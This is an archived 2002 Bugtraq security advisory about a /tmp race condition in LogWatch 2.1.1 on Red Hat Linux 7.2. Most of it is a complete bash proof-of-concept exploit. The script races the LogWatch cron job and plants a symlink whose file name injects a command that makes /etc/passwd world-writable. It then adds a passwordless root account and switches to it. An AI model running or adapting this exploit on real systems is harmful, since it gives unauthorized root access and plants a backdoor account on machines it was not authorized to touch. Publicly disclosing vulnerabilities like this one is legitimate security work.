8208133 2002-03-27 03:16 +0100 /110 rader/ Spybreak <spybreak@host.sk> Sänt av: joel@lysator.liu.se Importerad: 2002-03-27 19:53 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern kopiemottagare: vuln-dev@securityfocus.com Mottagare: Bugtraq (import) <21599> Ärende: Root compromise through LogWatch 2.1.1 ------------------------------------------------------------ From: "Spybreak" <spybreak@host.sk> To: bugtraq@securityfocus.com Cc: vuln-dev@securityfocus.com Message-ID: <20020327031626.M78748@host.sk> Release : March 27 2002 Author : Spybreak <spybreak@host.sk> Software : LogWatch Version : 2.1.1 Homepage : www.kaybee.org/~kirk/html/linux.html Problems : A /tmp race condition leads to root --- INTRO --- LogWatch is a customizable log analysis system. LogWatch parses through your system's logs for a given period of time and creates a report analyzing areas that you specify, in as much detail as you require. The collected results are reported to a chosen e-mail address, root by default. LogWatch 2.1.1 is a part of the Red Hat Linux 7.2 distribution, enabled by default and daily run by the cron daemon. --- PROBLEM --- On a system running LogWatch, a local user is able to gain unauthorized root access, due to a race condition during the temporary directory creation. --- EXPLOIT --- cat > logwatch211.sh <<EOF #!/bin/bash # # March 27 2002 # # logwatch211.sh # # Proof of concept exploit code # for LogWatch 2.1.1 # Waits for LogWatch to be run then gives root shell # For educational purposes only # # (c) Spybreak <spybreak@host.sk> SERVANT="00-logwatch" # Logwatch's cron entry SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/ echo echo "LogWatch 2.1.1 root shell exploit" echo '(c) Spybreak <spybreak@host.sk>' echo echo "Waiting for LogWatch to be executed" while :; do set `ps -o pid -C $SERVANT` if [ -n "$2" ]; then mkdir /tmp/logwatch.$2 ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron break; fi done echo "Waiting for LogWatch to finish it's work" while :; do set `ps -o pid -C $SERVANT` if [ -z "$2" ]; then ls -l /etc/passwd|mail root echo master::0:0:master:/root:/bin/bash >> /etc/passwd break; fi done su master EOF -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org mQGiBDyNCFYRBADSWAw4wBseXXi5O85Y/vXLauDyIZWCDg3oHTI8muKmMc4gUuPy yYtrzF3eYKunDxxxyHNKgtFPwbQ/gRSZrtNb3HnWvWfE5BJlJ34+gsezlHztLrbu HU07OGVj9LzAqXp9hv/zVhFombUjjJw3PtBb4nURsCyKNI2ELOaRlb5TtwCglbk6 Mb+83fkFWO7Netq6BM1qMIUD/1rrsDaMmsZe3ykiSo3yNnBmM4Dy2t4detn0BSF0 WzJ5AoX7Waa0e3I5aGiHxwE2v+fjGv5G1f+Ho0COt0YaPouWrt3kzEYa1TbtSNmK 9B/v00J/MYB311G1oMBJ1Qnaudc/6A2GsE9M05ubyfze/LccJk+/iuL/JPbHB6bz tO8LA/0aZgOS8Vxu5Y6+kd0x61sAyvRvec8kriQcd2ntY8e1/ajJGGEoTGburn/8 pbyaQv3d01C9xQWkIQDHG9vveSaDe6g2wViPeRck5qENUoUZVAp92GarntYk5u5L puW/iECkH5qfVyirc3x5F3iE5UhwSggPdJbVCVlXWF0S/jwdm7QbU3B5YnJlYWsg PHNweWJyZWFrQGhvc3Quc2s+iFcEExECABcFAjyNCFYFCwcKAwQDFQMCAxYCAQIX gAAKCRD618glLCYuNiIhAJ4v+NjW2sxebAqvatiwUy5T/PQV8gCfXAvm52qI62yD rF1C5eqSJE38V3i5AQ0EPI0IWhAEANIdWxgsOG4aeTxnm22g2BKEF9kUBk6H16u8 SUjuO1tEsTOQrX7jwf+vMNTUlt1OEyX+FdPkhIbDxZPyfItGmsZItPsv5f5za4We 41QDnWZLPbLVR+DznDgBrPlbEJ402GD/kXGbIvN/G2bO+GV5onOOf0Xg0z62YEnv ZmTMOTe/AAMFA/9bZqUpP5NHilu6vZfHybT7RqtnZoIVgVCnEChRPVN6DtcxS0Ux YMTD/qnHlpa4Brwd2+jpOIfnx8NQT1Ijan66LN2u/qK5Y4O17gIgc9rn4js8XeVp cPWq33Ux1ComMiWMuaJ5uIPPbGHgqGaR2HZ4tQt43AqzkuR6PWNR7lHAJYhGBBgR AgAGBQI8jQhaAAoJEPrXyCUsJi42O7cAnjjZ0x6WOvGcX8nicpPCeUiyAIFmAJ49 JuaXm+j6UXFsTyeAkSYbGwHP5g== =0feG -----END PGP PUBLIC KEY BLOCK----- (8208133) /Spybreak <spybreak@host.sk>/-------------